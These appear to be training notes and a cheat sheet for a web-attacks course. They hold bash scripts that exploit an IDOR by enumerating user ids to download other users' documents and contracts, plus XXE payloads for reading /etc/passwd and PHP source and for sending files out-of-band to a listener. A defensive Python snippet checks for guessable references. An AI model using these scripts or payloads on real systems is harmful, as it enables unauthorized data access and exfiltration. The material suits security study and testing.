IDOR
#!/bin/bash
# retrieve docs: walk uid 1..10 and fetch every PDF linked from each user's documents page
url="http://SERVER_IP:PORT"
for i in {1..10}; do
    for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "\/documents.*?\.pdf"); do
        wget -q "$url$link"   # $link already begins with /documents/, so no extra slash
    done
done

The document references are the MD5 of the base64-encoded uid, so they can be recomputed for any uid:
echo -n 1 | base64 -w 0 | md5sum
cdd96d3cc73d1dbdaffa03cc6cd7339b

Generate the references for uid 1..10 (tr strips the trailing "  -" that md5sum prints):
for i in {1..10}; do echo -n $i | base64 -w 0 | md5sum | tr -d ' -'; done
#!/bin/bash
# download contracts: POST each recomputed reference to download.php and save the
# response under the filename the server supplies (-O with -J honours Content-Disposition)
for i in {1..10}; do
    hash=$(echo -n "$i" | base64 -w 0 | md5sum | tr -d ' -')
    curl -sOJ -X POST -d "contract=$hash" "http://SERVER_IP:PORT/download.php"
done
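As an added, defender-side example (not part of the original notes): a Python check that confirms whether a document reference follows the predictable md5(base64(uid)) scheme used above, next to a hardened lookup that issues random per-user tokens and re-checks ownership on every request. The DocumentStore class, its method names and the in-memory store are assumptions standing in for the application's real database.

```python
import base64
import hashlib
import secrets

# The scheme the notes describe: reference = md5(base64(uid)).  Reproducing it
# lets a reviewer test whether an application's references are derivable from
# the sequential id they are meant to hide.
def predictable_ref(uid: int) -> str:
    return hashlib.md5(base64.b64encode(str(uid).encode())).hexdigest()

def recover_uid(ref: str, max_uid: int = 10000):
    """Return the uid behind ref if it follows the md5(base64(uid)) scheme, else None.

    A non-None result means the reference is guessable and the endpoint must
    not rely on it for access control.
    """
    ref = ref.strip().lower()
    for uid in range(max_uid + 1):
        if predictable_ref(uid) == ref:
            return uid
    return None

# Hardened alternative (assumption: an in-process dict stands in for the app's
# database).  References are random, bound to an owner, and every fetch checks
# that the requester is that owner, so knowing or guessing a token is not enough.
class DocumentStore:
    def __init__(self):
        self._docs = {}   # token -> (owner, server-side path)

    def register(self, owner: str, path: str) -> str:
        token = secrets.token_urlsafe(32)   # 256 random bits, unrelated to the uid
        self._docs[token] = (owner, path)
        return token

    def fetch(self, requester: str, token: str):
        entry = self._docs.get(token)
        if entry is None or entry[0] != requester:
            return None   # unknown token, or a token that belongs to someone else
        return entry[1]
```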
Cheat Sheet
This cheat sheet is a command reference for the Web Attacks module.
HTTP Verb Tampering

HTTP methods:
  HEAD
  PUT
  DELETE
  OPTIONS
  PATCH

Command     | Description
-X OPTIONS  | Set the HTTP method with curl
IDOR

Identify IDORs:
  In URL parameters & APIs
  In AJAX calls
  By understanding reference hashing/encoding
  By comparing user roles

Command  | Description
md5sum   | MD5 hash a string
base64   | Base64 encode a string
XXE

Code                                                                               | Description
<!ENTITY xxe SYSTEM "http://localhost/email.dtd">                                  | Define an external entity that loads a URL
<!ENTITY xxe SYSTEM "file:///etc/passwd">                                          | Define an external entity that reads a local file
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">   | Read PHP source code through the base64-encode filter (keeps the XML well-formed)
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">          | Read a file through a PHP error message (error-based XXE)
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">    | Read a file by out-of-band exfiltration to a listener on OUR_IP (blind XXE)